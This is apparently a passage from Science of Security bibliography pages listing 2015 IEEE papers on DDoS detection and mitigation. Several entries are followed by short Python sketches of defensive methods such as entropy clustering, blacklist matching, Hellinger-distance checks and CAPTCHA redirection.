Keywords: cloud computing; entropy; invasive software; pattern clustering; virtual machines; Botnet; Cloudsim; attack platform; cloud resources; cloud service providers; cloud services; clustering method; data clustering; highly dynamic heterogeneous environment; malicious actors; malicious behavior detection; malicious virtual machine detection; network parameter analysis; parallel processing; source-based attack detection; Cloud computing; Computer crime; Entropy; Monitoring; Principal component analysis; Scalability; Servers; DDoS; clustering; detection  (ID#: 16-9105)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336986&isnumber=7336956
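
Bazm et al. combine entropy and clustering on network parameters; the fragment below is a minimal re-creation of that general idea in Python, not the authors' code. The choice of features (destination-IP entropy and mean packet size) and the toy per-VM samples are assumptions:

import math
from collections import Counter
from sklearn.cluster import KMeans

def entropy(values):
    """Shannon entropy of a list of observations (e.g., destination IPs)."""
    counts = Counter(values)
    total = len(values)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# Hypothetical per-VM traffic samples: (destination IPs, packet sizes).
vm_traffic = {
    "vm-1": (["10.0.0.5"] * 90 + ["10.0.0.6"] * 10, [64] * 100),   # focused flood
    "vm-2": ([f"10.0.{i}.{i}" for i in range(100)], [200] * 100),  # diverse, benign-like
    "vm-3": (["10.0.0.5"] * 100, [64] * 100),
}

# Feature vector per VM: destination entropy and mean packet size.
names = list(vm_traffic)
features = [[entropy(dsts), sum(sizes) / len(sizes)] for dsts, sizes in vm_traffic.values()]

labels = KMeans(n_clusters=2, n_init=10).fit_predict(features)
for name, label in zip(names, labels):
    print(name, "-> cluster", label)  # the low-entropy cluster is the suspect one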

 

Pramana, M.I.W.; Purwanto, Y.; Suratman, F.Y., “DDoS Detection using Modified K-Means Clustering with Chain Initialization over Landmark Window,” in Control, Electronics, Renewable Energy and Communications (ICCEREC), 2015 International Conference on, vol., no., pp. 7–11, 27–29 Aug. 2015. doi:10.1109/ICCEREC.2015.7337056
Abstract: Denial-of-service is a common form of network attack that affects user access rights by preventing legitimate users from accessing certain information, thus greatly disadvantaging both the user and the service provider. This paper presents a method of denial-of-service detection using a clustering technique with the k-means algorithm, which can be modified and developed in many possible ways. The k-means algorithm used in this paper is modified using chain initialization over a landmark window approach to process large amounts of data, and the results are evaluated in terms of detection rate, accuracy, and false positive rate. This method has proven effective in detecting denial-of-service traffic on the DARPA 98 dataset, with satisfying results.
Keywords: authorisation; computer network security; pattern clustering; DARPA 98 dataset; DDoS detection; chain initialization over landmark window approach; denial-of-service network attack; modified K-means clustering; user access right; Algorithm design and analysis; Clustering algorithms; Computer crime; Convergence; Data mining; IP networks; Signal processing algorithms; Chain Initialization; Clustering; DDoS; Landmark Window; Modified K-Means (ID#: 16-9106)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7337056&isnumber=7337022
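
The abstract does not spell out the chain initialization; one plausible reading, sketched below on synthetic data, is to seed the k-means run for each landmark window with the centroids of the previous window. The feature choice and window contents here are invented for illustration:

import numpy as np
from sklearn.cluster import KMeans

def chained_kmeans(windows, k=2):
    """Cluster each landmark window of traffic features, seeding every run
    with the centroids of the previous window ("chain initialization").

    `windows` is an iterable of (n_samples, n_features) arrays; the exact
    features (packets/s, distinct sources, ...) are an assumption here.
    """
    centroids = None
    for window in windows:
        if centroids is None:
            km = KMeans(n_clusters=k, n_init=10)
        else:
            km = KMeans(n_clusters=k, init=centroids, n_init=1)
        labels = km.fit_predict(window)
        centroids = km.cluster_centers_
        yield labels, centroids

# Two synthetic windows: mostly benign points plus a dense attack blob.
rng = np.random.default_rng(0)
w1 = np.vstack([rng.normal(10, 2, (50, 2)), rng.normal(100, 5, (20, 2))])
w2 = np.vstack([rng.normal(11, 2, (50, 2)), rng.normal(105, 5, (40, 2))])
for labels, _ in chained_kmeans([w1, w2]):
    print(np.bincount(labels))   # cluster sizes per window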

 

Maiti, Sumana; Garai, Chandan; Dasgupta, Ranjan, “A Detection Mechanism of DoS Attack Using Adaptive NSA Algorithm in Cloud Environment,” in Computing, Communication and Security (ICCCS), 2015 International Conference on, vol., no., pp. 1–7, 4–5 Dec. 2015. doi:10.1109/CCCS.2015.7374128
Abstract: Security of any distributed system is not only complex in nature; it also needs much more attention, as most of the applications being used and developed in the recent past are on distributed platforms. A Denial of Service (DoS) attack causes a drop in quality of service and may even lead to a complete absence of service for some “real” users. Identifying some users as attackers also needs an appropriate algorithm. The negative selection algorithm (NSA) is a very effective approach to identifying a user as an attacker. However, declaring a “real” user to be an attacker is a very common limitation of these types of algorithms unless the detection mechanism is updated at regular intervals. In this research work we have modified the NSA algorithm to take into account the necessity of updating the detector set from time to time, and have introduced a second detection module to accommodate these updates. Both algorithms are implemented on a common data set and a comparative study is presented. Our proposed algorithm comes out with much improved results and significantly reduces false positive (false alarm) cases.
Keywords: Computer crime; Computers; Feature extraction; Floods; IP networks; Ports (Computers); Traffic control; DDoS; Feature Vector; IP Spoofing; NSA (ID#: 16-9107)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7374128&isnumber=7374113
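
For readers unfamiliar with negative selection, the toy sketch below shows the core NSA loop: generate random detectors, discard any that match known-benign "self" samples, then flag traffic covered by the survivors. The feature space, matching rule, and radius are assumptions, and the periodic detector refresh that is the paper's contribution is only indicated in a comment:

import random

def matches(detector, sample, radius=0.1):
    """A detector 'covers' a sample if they are close in feature space."""
    return all(abs(d - s) <= radius for d, s in zip(detector, sample))

def generate_detectors(self_set, n_detectors, dim=2):
    """Negative selection: keep only random detectors matching no self sample."""
    detectors = []
    while len(detectors) < n_detectors:
        candidate = [random.random() for _ in range(dim)]
        if not any(matches(candidate, s) for s in self_set):
            detectors.append(candidate)
    return detectors

def is_attack(sample, detectors):
    return any(matches(d, sample) for d in detectors)

# Normalised [0, 1] feature vectors of known-benign traffic (assumed features).
self_set = [[0.1, 0.2], [0.15, 0.25], [0.2, 0.2]]
detectors = generate_detectors(self_set, n_detectors=50)
print(is_attack([0.9, 0.8], detectors))   # far from self: likely flagged
# Maiti et al.'s second module would periodically rebuild `detectors` from a
# refreshed self set, so stale detectors stop flagging real users.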

 

Hurtik, P.; Hodakova, P.; Perfilieva, I.; Liberts, M.; Asmuss, J., “Network Attack Detection and Classification by the F-Transform,” in Fuzzy Systems (FUZZ-IEEE), 2015 IEEE International Conference on, vol., no., pp. 1–6, 2–5 Aug. 2015. doi:10.1109/FUZZ-IEEE.2015.7337991
Abstract: We solve the problem of network attack detection and classification. We discuss the generation and simulation of artificial network traffic data. We propose an efficient algorithm for data classification that is based on the F-transform technique. The algorithm successfully passed all tests and, moreover, showed the ability to perform classification in an on-line regime.
Keywords: computer network security; pattern classification; telecommunication traffic; transforms; DDoS detection; F-transform technique; artificial network traffic data generation; artificial network traffic data simulation; data classification; distributed denial-of-service attack; network attack classification; network attack detection; Computer crime; Databases; Mathematical model; Monitoring; Polynomials; Time series analysis; Transforms (ID#: 16-9108)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7337991&isnumber=7337796
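
The direct discrete F-transform itself is standard: each component is a weighted average of the signal under one basis function of a fuzzy partition. The sketch below computes it with a uniform triangular partition; using the component vector as a classification feature, and the toy traffic series, are illustrative assumptions rather than the authors' setup:

import numpy as np

def f_transform(y, n_components):
    """Direct discrete F-transform with a uniform triangular fuzzy partition.

    Each component F_k is a weighted mean of the signal under basis A_k,
    giving a smooth, low-dimensional feature vector for classification.
    """
    x = np.linspace(0.0, 1.0, len(y))
    nodes = np.linspace(0.0, 1.0, n_components)
    h = nodes[1] - nodes[0]
    components = []
    for c in nodes:
        weights = np.clip(1.0 - np.abs(x - c) / h, 0.0, 1.0)  # triangular A_k
        components.append(np.dot(weights, y) / weights.sum())
    return np.array(components)

# A flat series vs. one with a sudden volume burst (assumed traffic counts).
normal = np.ones(200) * 100 + np.random.default_rng(1).normal(0, 5, 200)
attack = normal.copy(); attack[120:160] += 900

print(np.round(f_transform(normal, 8)))
print(np.round(f_transform(attack, 8)))   # the burst shows in later components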

 

Ghafir, I.; Prenosil, V., “Blacklist-Based Malicious IP Traffic Detection,” in Communication Technologies (GCCT), 2015 Global Conference on, vol., no., pp. 229–233, 23–24 April 2015. doi:10.1109/GCCT.2015.7342657
Abstract: At present, malicious software or malware has increased considerably to form a serious threat to Internet infrastructure. It has become the major source of most malicious activities on the Internet, such as direct attacks, (distributed) denial-of-service (DoS) activities and scanning. Infected machines may join a botnet and can be used as remote attack tools to perform malicious activities controlled by the botmaster. In this paper we present our methodology for detecting any connection to or from a malicious IP address which is expected to be a command and control (C&C) server. Our detection method is based on a blacklist of malicious IPs, formed from several intelligence feeds at once. We process the network traffic and match the source and destination IP addresses of each connection against the IP blacklist. The intelligence feeds are automatically updated each day and the detection runs in real time.
Keywords: IP networks; Internet; computer network security; invasive software; C&C server; DDOS; Internet infrastructure; blacklist-based malicious IP traffic detection; command and control server; distributed denial-of-service; malicious software; malware; Electronic mail; Feeds; IP networks; Malware; Monitoring; Servers; Cyber attacks; botnet; intrusion detection system; malicious IP (ID#: 16-9109)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7342657&isnumber=7342608
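
The detection step reduces to set membership over a merged blacklist. A minimal sketch, with hypothetical feed files and addresses, might look like this:

def load_blacklist(paths):
    """Merge several intelligence feeds (one IP per line) into one set."""
    blacklist = set()
    for path in paths:
        with open(path) as fh:
            blacklist.update(line.strip() for line in fh if line.strip())
    return blacklist

def check_flow(src_ip, dst_ip, blacklist):
    """Flag any connection whose source or destination is blacklisted,
    which the paper treats as probable C&C communication."""
    return src_ip in blacklist or dst_ip in blacklist

# Stand-in for load_blacklist(["feed_a.txt", "feed_b.txt"]), refreshed daily.
blacklist = {"198.51.100.7", "203.0.113.9"}
print(check_flow("192.0.2.10", "198.51.100.7", blacklist))   # True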
 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Distributed Denial of Service Attack Mitigation 2015

 

 
SoS Logo

Distributed Denial of Service Attack Mitigation 2015

 

Distributed Denial of Service Attacks continue to be among the most prolific forms of attack against information systems.  According to the NSFOCUS DDOS Report for 2014 (available at: http://en.nsfocus.com/2014/SecurityReport_0320/165.html), DDOS attacks occur at the rate of 28 per hour.  Research into methods of response and mitigation is also substantial, as the articles presented here show.  This work was presented in 2015.


Akbar, Abdullah; Basha, S.Mahaboob; Sattar, Syed Abdul, "Leveraging the SIP Load Balancer to Detect and Mitigate DDoS Attacks," in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, pp. 1204-1208, 8-10 Oct. 2015. doi: 10.1109/ICGCIoT.2015.7380646

Abstract: SIP-based Voice over IP (VoIP) networks are becoming predominant in current and future communications. Distributed Denial of Service attacks pose a serious threat to VoIP network security, and SIP servers are their victims. The major aim of DDoS attacks is to prevent legitimate users from accessing the resources of SIP servers. DDoS attacks target the VoIP network by deploying bots at different locations and injecting malformed packets, and can even halt the entire VoIP service, causing degradation of QoS (Quality of Service). DDoS attacks are easy to launch and quickly drain the computational resources of VoIP networks and nodes. Detecting DDoS attacks is challenging and extremely difficult due to the varying strategies and scope of attackers. Many DDoS detection and prevention schemes are deployed in VoIP networks, but none works completely in both real-time and offline modes: they are inefficient in detecting dynamic and low-rate DDoS attacks and even fail when the attack is launched by simultaneously manipulating multiple SIP attributes. In this paper we propose a novel scheme based on the Hellinger distance (HD) to detect low-rate and multi-attribute DDoS attacks. Usually, DDoS detection and mitigation schemes are implemented in the SIP proxy, but we leverage the SIP load balancer to fight DDoS by using its existing load-balancing features. We have implemented the proposed scheme by modifying the leading open-source Kamailio SIP proxy server. We have evaluated our scheme with an experimental test setup and found that the results outperform existing DDoS prevention schemes in terms of detection rate, system overhead and false-positive alarms.

Keywords: Computer crime; Feature extraction; Floods; Internet telephony; Multimedia communication; Protocols; Servers; Overload Control; Session Initiation Protocol (SIP); kamailio; server (ID#: 16-9064)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380646&isnumber=7380415
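
As a rough illustration of the Hellinger-distance test (not the authors' implementation), the fragment below compares the SIP method mix of a training window against the current window; the attribute choice, toy data, and 0.2 threshold are assumptions:

import math
from collections import Counter

def hellinger(p, q):
    """Hellinger distance between two discrete distributions (dicts)."""
    keys = set(p) | set(q)
    return math.sqrt(0.5 * sum(
        (math.sqrt(p.get(k, 0.0)) - math.sqrt(q.get(k, 0.0))) ** 2 for k in keys))

def distribution(messages):
    counts = Counter(messages)
    total = len(messages)
    return {k: c / total for k, c in counts.items()}

# SIP method mix in a training window vs. the current window (toy data).
training = distribution(["INVITE"] * 40 + ["ACK"] * 40 + ["BYE"] * 20)
current = distribution(["INVITE"] * 85 + ["ACK"] * 10 + ["BYE"] * 5)  # INVITE flood?

THRESHOLD = 0.2   # tuning this is exactly what the paper's evaluation is about
if hellinger(training, current) > THRESHOLD:
    print("possible low-rate/multi-attribute DDoS: act at the load balancer")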

 

Santanna, J.J.; van Rijswijk-Deij, R.; Hofstede, R.; Sperotto, A.; Wierbosch, M.; Zambenedetti Granville, L.; Pras, A., "Booters — An Analysis of DDoS-as-a-Service Attacks," in Integrated Network Management (IM), 2015 IFIP/IEEE International Symposium on, pp. 243-251, 11-15 May 2015. doi: 10.1109/INM.2015.7140298

Abstract: In 2012, the Dutch National Research and Education Network, SURFnet, observed a multitude of Distributed Denial of Service (DDoS) attacks against educational institutions. These attacks were effective enough to cause the online exams of hundreds of students to be cancelled. Surprisingly, these attacks were purchased by students from Web sites, known as Booters. These sites provide DDoS attacks as a paid service (DDoS-as-a-Service) at costs starting from 1 USD. Since this problem was first identified by SURFnet, Booters have been used repeatedly to perform attacks on schools in SURFnet's constituency. Very little is known, however, about the characteristics of Booters, and particularly how their attacks are structured. This is vital information needed to mitigate these attacks. In this paper we analyse the characteristics of 14 distinct Booters based on more than 250 GB of network data from real attacks. Our findings show that Booters pose a real threat that should not be underestimated, especially since our analysis suggests that they can easily increase their firepower based on their current infrastructure.

Keywords: Web sites; computer network security; educational administrative data processing; educational institutions; Booters Web site; DDoS-as-a-service attack analysis; Dutch National Research and Education Network; SURFnet; attack mitigation; distributed denial-of-service attacks; educational institutions; firepower; network data; online exams; paid service; Algorithm design and analysis; Computer crime; Crawlers; IP networks; Internet; Protocols; Servers (ID#: 16-9065)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7140298&isnumber=7140257

 

Ndibwile, J.D.; Govardhan, A.; Okada, K.; Kadobayashi, Y., "Web Server Protection against Application Layer DDoS Attacks Using Machine Learning and Traffic Authentication," in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol. 3, pp. 261-267, 1-5 July 2015. doi: 10.1109/COMPSAC.2015.240

Abstract: Application layer Distributed Denial of Service (DDoS) attacks are among the deadliest kinds of attacks that have significant impact on destination servers and networks, due to their ability to be launched with minimal computational resources to cause an effect of high magnitude. Commercial and government Web servers have become the primary target of these kinds of attacks, with recent mitigation efforts struggling to contain the problem efficiently. Most application layer DDoS attacks can successfully mimic legitimate traffic without being detected by Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS). IDSs and IPSs can also mistake a normal and legitimate activity for a malicious one, producing a False Positive (FP) that affects Web users if it is ignored or dropped. False positives in a large and complex network topology can potentially be dangerous, as they may cause the IDS/IPS to block a user's benign traffic. Our focus and contributions in this paper are, first, to mitigate undetected malicious traffic mimicking legitimate traffic by developing a special anti-DDoS module for general and specific DDoS tool attacks, using a trained classifier in a random tree machine-learning algorithm. We use labeled datasets to generate rules to incorporate into and fine-tune existing IDS/IPS such as Snort. Secondly, we further assist the IDS/IPS by processing traffic that it classifies as malicious in order to identify FPs and route them to their intended destinations. To achieve this, our approach uses active authentication of the traffic source of both legitimate and malicious traffic, at the Bait and Decoy servers respectively, before it is forwarded to the Web server.

Keywords: Internet; computer network security; file servers; learning (artificial intelligence); pattern classification; telecommunication traffic; FP; IDS; IPS; Web server protection; Web users; application layer DDoS attacks; bait-and-decoy server; destination servers; distributed denial of service; false positive; government Web servers; intrusion detection systems; intrusion prevention systems; legitimate traffic; malicious traffic; minimal computational resources; mitigation efforts; random tree machine-learning algorithm; traffic authentication; traffic source active authentication; trained classifier; Authentication; Computer crime; Logic gates; Training; Web servers; DDoS Mitigation; False Positives; IDS/IPS; Java Script; Machine Learning (ID#: 16-9066)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273365&isnumber=7273299
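
The paper trains a random tree classifier on labelled traffic; the sketch below substitutes a single scikit-learn decision tree as a stand-in, with invented flow features and labels, just to show the train-then-predict shape of the approach:

from sklearn.tree import DecisionTreeClassifier

# Toy labelled flows: [requests/s, mean inter-arrival (s), distinct URLs].
# A real deployment would train on labelled traces (e.g., replayed DDoS-tool
# traffic) and export the learned tests as Snort-style rules.
X = [
    [300, 0.003, 1], [250, 0.004, 2], [400, 0.002, 1],   # tool-generated floods
    [3, 0.4, 12], [5, 0.2, 30], [2, 0.5, 8],             # human browsing
]
y = [1, 1, 1, 0, 0, 0]   # 1 = attack, 0 = benign

clf = DecisionTreeClassifier(max_depth=3).fit(X, y)
print(clf.predict([[280, 0.003, 1], [4, 0.3, 20]]))   # -> [1 0]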

 

Zeb, K.; Baig, O.; Asif, M.K., "DDoS Attacks and Countermeasures in Cyberspace," in Web Applications and Networking (WSWAN), 2015 2nd World Symposium on, pp. 1-6, 21-23 March 2015. doi: 10.1109/WSWAN.2015.7210322

Abstract: In cyberspace, the availability of resources is a key component of cyber security, along with confidentiality and integrity. The Distributed Denial of Service (DDoS) attack has become one of the major threats to the availability of resources in computer networks, and it is a challenging problem on the Internet. In this paper, we present a detailed study of DDoS attacks on the Internet, specifically the attacks due to protocol vulnerabilities in the TCP/IP model, their countermeasures, and various DDoS attack mechanisms. We thoroughly review DDoS attack defenses and analyze the strengths and weaknesses of the different proposed mechanisms.

Keywords: Internet; computer network security; transport protocols; DDoS attack mechanisms; Internet; TCP-IP model; computer networks; cyber security; cyberspace; distributed denial of service attacks; Computer crime; Filtering; Floods; IP networks; Internet; Protocols; Servers; Cyber security; Cyber-attack; Cyberspace; DDoS Defense; DDoS attack; Mitigation; Vulnerability (ID#: 16-9067)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7210322&isnumber=7209078

 

Al-Ali, Zaid; Al-Duwairi, Basheer; Al-Hammouri, Ahmad T., "Handling System Overload Resulting from DDoS Attacks and Flash Crowd Events," in Cyber Security and Cloud Computing (CSCloud), 2015 IEEE 2nd International Conference on, pp. 512-512, 3-5 Nov. 2015. doi: 10.1109/CSCloud.2015.66

Abstract: This paper presents a system that provides mitigation for DDoS attacks as a service, and is capable of handling flash crowd events at the same time. Providing DDoS protection as a service represents an important solution especially for Websites that have limited resources with no infrastructure in place for defense against these attacks. The proposed system is composed of two main components: (i) The distributed CAPTCHA service, which comprises a large number of powerful nodes geographically and suitably distributed in the Internet acting as a large distributed firewall, and (ii) The HTTP redirect module, which is a stateless HTTP server that redirects Web requests destined to the targeted Webserver to one of the CAPTCHA nodes. The CAPTCHA node can then segregate legitimate clients from automated attacks by requiring them to solve a challenge. Upon successful response, legitimate clients (humans) are forwarded through a given CAPTCHA node to the Webserver.

Keywords: Ash; CAPTCHAs; Computer crime; Conferences; Relays; Servers (ID#: 16-9068)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371531&isnumber=7371418
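
The HTTP redirect module is described as a stateless server that bounces Web requests to a CAPTCHA node. A minimal stand-in using Python's standard library, with hypothetical node URLs, could look like this:

import random
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical CAPTCHA nodes of the distributed firewall.
CAPTCHA_NODES = ["https://captcha-1.example.net", "https://captcha-2.example.net"]

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        node = random.choice(CAPTCHA_NODES)       # spread load across nodes
        self.send_response(302)
        self.send_header("Location", node + self.path)
        self.end_headers()                        # no per-client state is kept

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectHandler).serve_forever()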

 

Singh, K.J.; De, T., "DDOS Attack Detection and Mitigation Technique Based on Http Count and Verification Using CAPTCHA," in Computational Intelligence and Networks (CINE), 2015 International Conference on, pp. 196-197, 12-13 Jan. 2015. doi: 10.1109/CINE.2015.47

Abstract: With the rapid development of the internet, the number of people who are online has also increased tremendously. But nowadays we find not only growing positive use of the internet but also negative use of it; the misuse and abuse of the internet is growing at an alarming rate. There are many cases of viruses and worms infecting systems that have software vulnerabilities. These systems can even become clients for bot herders, and such infected systems aid in launching DDoS attacks against a target server. In this paper we introduce the concept of IP blacklisting, which blocks all blacklisted IP addresses; an HTTP count filter, which enables us to distinguish normal from suspected IP addresses; and the CAPTCHA technique, to cross-check whether these suspected IP addresses are controlled by a human or a botnet.

Keywords: Internet; client-server systems; computer network security; computer viruses; transport protocols; CAPTCHA; DDOS attack detection; DDOS attack mitigation technique; HTTP count filter; HTTP verification; IP address; IP blacklisting; Internet; botnet; software vulnerability; target server; virus; worms; CAPTCHAs; Computer crime; IP networks; Internet; Radiation detectors; Servers; bot; botnets; captcha; filter; http; mitigation (ID#: 16-9069)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7053830&isnumber=7053782
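
A sketch of the described pipeline (blacklist check, per-IP HTTP count over a window, CAPTCHA challenge on excess) is given below; the window length and request limit are assumptions, not values from the paper:

import time
from collections import defaultdict, deque

WINDOW = 10.0        # seconds
SUSPECT_LIMIT = 50   # requests per window before a CAPTCHA challenge (assumed)

blacklist = set()
history = defaultdict(deque)   # source IP -> timestamps of recent requests

def on_http_request(src_ip):
    if src_ip in blacklist:
        return "drop"
    now = time.monotonic()
    q = history[src_ip]
    q.append(now)
    while q and now - q[0] > WINDOW:     # slide the window
        q.popleft()
    if len(q) > SUSPECT_LIMIT:
        return "challenge"   # serve a CAPTCHA; a failed solve => blacklist.add(src_ip)
    return "serve"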

 

Gde Dharma, N.I.; Muthohar, M.F.; Prayuda, J.D.A.; Priagung, K.; Deokjai Choi, "Time-based DDoS Detection and Mitigation for SDN Controller," in Network Operations and Management Symposium (APNOMS), 2015 17th Asia-Pacific, pp. 550-553, 19-21 Aug. 2015. doi: 10.1109/APNOMS.2015.7275389

Abstract: A Software Defined Network (SDN) is a new paradigm in network management that separates the control plane and the data plane. The control plane has an important role in managing the whole network; since SDN introduces the control plane as the manager of the network, it also introduces a single point of failure. When the SDN controller is unreachable by the network devices, the whole network will collapse, and one of the attack methods that can make an SDN controller unreachable is a DDoS attack. This paper reports the initial step of our research to develop a method for DDoS attack detection and mitigation for the SDN controller. The method considers the time duration of DDoS attack detection and the attack's time pattern to prevent future attacks. In this paper, we present the potential vulnerabilities in the SDN controller that can be exploited for DDoS attacks and discuss methods to detect and mitigate them.

Keywords: computer network management; computer network reliability; computer network security; control engineering computing; software defined networking; SDN controller failure; control plane; data plane; software defined network management; time-based DDoS attack detection; time-based DDoS attack mitigation; Computer crime; Floods; Monitoring; Software defined networking; Switches; DDoS attack; Network; Network Management; Network Security; SDN (ID#: 16-9070)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275389&isnumber=7275336
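
The paper's method is reported only at a high level; the sketch below illustrates the time-based ingredient, counting controller-bound packet-in events per interval and recording attack times for later pattern analysis. The interval and threshold are assumptions:

import time
from collections import deque

class PacketInMonitor:
    """Counts controller-bound packet-in events per interval; a sustained
    surge marks a possible controller-saturation DDoS. Thresholds assumed."""
    def __init__(self, interval=1.0, threshold=500):
        self.interval, self.threshold = interval, threshold
        self.events = deque()
        self.attack_times = []   # kept to learn the attackers' time pattern

    def on_packet_in(self):
        now = time.monotonic()
        self.events.append(now)
        while self.events and now - self.events[0] > self.interval:
            self.events.popleft()
        if len(self.events) > self.threshold:
            self.attack_times.append(now)
            return True    # e.g., push drop or rate-limit rules to the switches
        return False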

 

Jaehoon Jeong; Jihyeok Seo; Geumhwan Cho; Hyoungshick Kim; Jung-Soo Park, "A Framework for Security Services Based on Software-Defined Networking," in Advanced Information Networking and Applications Workshops (WAINA), 2015 IEEE 29th International Conference on, pp. 150-153, 24-27 March 2015. doi: 10.1109/WAINA.2015.102

Abstract: This paper proposes a framework for security services using Software-Defined Networking (SDN) and specifies requirements for such a framework. It describes two representative security services: (i) a centralized firewall system and (ii) a centralized DDoS-attack mitigation system. For each service, this paper discusses the limitations of legacy systems and presents a possible SDN-based system to protect network resources by controlling suspicious and dangerous network traffic that can be regarded as a security attack.

Keywords: computer network security; firewalls; software defined networking; software maintenance; SDN; centralized DDoS-attack mitigation system; centralized firewall system; legacy system; network resource protection; network traffic; security attack; security service; software-defined networking; Access control; Computer crime; Control systems; Firewalls (computing); Malware; Servers; DDoS-Attack Mitigator; Firewall; Framework; Security Services; Software-Defined Networking (ID#: 16-9071)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7096163&isnumber=7096097

 

Ugwoke, F.N.; Okafor, K.C.; Chijindu, V.C., "Security QoS Profiling Against Cyber Terrorism in Airport Network Systems," in Cyberspace (CYBER-Abuja), 2015 International Conference on, pp. 241-251, 4-7 Nov. 2015. doi: 10.1109/CYBER-Abuja.2015.7360516

Abstract: Attacks on airport information network services in the form of Denial of Service (DoS), Distributed DoS (DDoS), and hijacking are the most effective schemes mostly explored by cyber terrorists in the aviation industry running Mission Critical Services (MCSs). This work presents a case for the Airport Information Resource Management System (AIRMS), a cloud-based platform proposed for the Nigerian aviation industry. Granting that AIRMS is susceptible to DoS attacks, there is a need to develop a robust counter-security network model aimed at pre-empting such attacks and subsequently mitigating the vulnerability in such networks. Existing works in the literature regarding cyber security DoS and other schemes have not explored embedded Stateful Packet Inspection (SPI) based on the OpenFlow Application Centric Infrastructure (OACI) for securing critical network assets. As such, SPI-OACI is proposed to address the challenge of Vulnerability Bandwidth Depletion DDoS Attacks (VBDDA). A characterization of the Cisco 9000 router firewall as an embedded network device with support for virtual DDoS protection was carried out in the AIRMS threat mitigation design. Afterwards, the mitigation procedure and the initial phase of the design were realized with the Riverbed Modeler software. For the security Quality of Service (QoS) profiling, the system response metrics (i.e., SPI-OACI delay, throughput and utilization) in the cloud-based network were analyzed only for normal traffic flows. The work concludes by offering practical suggestions for securing similar enterprise management systems running on cloud infrastructure against cyber terrorists.

Keywords: airports; cloud computing; embedded systems; firewalls; information management; quality of service; telecommunication network routing; AIRMS; Cisco 9000 router firewall; MCS; Nigerian aviation industry; OpenFlow application centric infrastructure; SPI-OACI; VBDDA; airport information network services; airport information resource management systems; airport network systems; aviation industry; cloud based network; cloud based platform; cloud infrastructure; critical network assets; cyber terrorism; cyber terrorists; denial of service; distributed DoS; embedded network device; mission critical services; quality of service profiling; riverbed modeler software; robust counter security network model; security QoS profiling; stateful packet inspection; system response metrics; virtual DDoS protection; vulnerability bandwidth depletion DDoS attacks; Air traffic control; Airports; Atmospheric modeling; Computer crime; Floods; AIRMS; Attacks; Aviation Industry; Cloud Datacenters; DDoS; DoS; Mitigation Techniques; Vulnerabilities (ID#: 16-9072)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7360516&isnumber=7360499

 

Gillani, F.; Al-Shaer, E.; Lo, S.; Qi Duan; Ammar, M.; Zegura, E., "Agile Virtualized Infrastructure to Proactively Defend Against Cyber Attacks," in Computer Communications (INFOCOM), 2015 IEEE Conference on, pp. 729-737, April 26 2015-May 1 2015. doi: 10.1109/INFOCOM.2015.7218442

Abstract: DDoS attacks have been a persistent threat to network availability for many years. Most of the existing mitigation techniques attempt to protect against DDoS by filtering out attack traffic. However, as critical network resources are usually static, adversaries are able to bypass filtering by sending stealthy, low-rate traffic from a large number of bots that mimics benign traffic behavior. Sophisticated stealthy attacks on critical links can cause a devastating effect, such as partitioning domains and networks. In this paper, we propose to defend against DDoS attacks by proactively changing the footprint of critical resources in an unpredictable fashion to invalidate an adversary's knowledge and plan of attack against critical network resources. Our present approach employs virtual networks (VNs) to dynamically reallocate network resources using VN placement, and offers constant VN migration to new resources. Our approach has two components: (1) a correct-by-construction VN migration planning that significantly increases the uncertainty about the critical links of multiple VNs while preserving the VN placement properties, and (2) an efficient VN migration mechanism that identifies the appropriate configuration sequence to enable node migration while maintaining network integrity (e.g., avoiding session disconnection). We formulate and implement this framework using SMT logic. We also demonstrate the effectiveness of our implemented framework on both PlanetLab and Mininet-based experiments.

Keywords: computer network security; formal logic; virtualisation; DDoS attacks; Mininet; PlanetLab; SMT logic; VN migration; VN placement; agile virtualized infrastructure; attack mitigation techniques; critical network resources; cyber attacks; distributed denial-of-service attack; network availability; network resource reallocation; virtual networks; Computational modeling; Computer crime; Mathematical model; Reconnaissance; Routing protocols; Servers; Substrates (ID#: 16-9073)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7218442&isnumber=7218353

 

Kalliola, A.; Kiryong Lee; Heejo Lee; Aura, T., "Flooding DDoS Mitigation and Traffic Management with Software Defined Networking," in Cloud Networking (CloudNet), 2015 IEEE 4th International Conference on, pp. 248-254, 5-7 Oct. 2015. doi: 10.1109/CloudNet.2015.7335317

Abstract: Mitigating distributed denial-of-service attacks can be a complex task due to the wide range of attack types, attacker adaptation, and defender constraints. We propose a defense mechanism which is largely automated and can be implemented on current software defined networking (SDN)-enabled networks. Our mechanism combines normal traffic learning, external blacklist information, and elastic capacity invocation in order to provide effective load control, filtering and service elasticity during an attack. We implement the mechanism and analyze its performance on a physical SDN testbed using a comprehensive set of real-life normal traffic traces and synthetic attack traces. The results indicate that the mechanism is effective in maintaining roughly 50% to 80% service levels even when hit by an overwhelming attack.

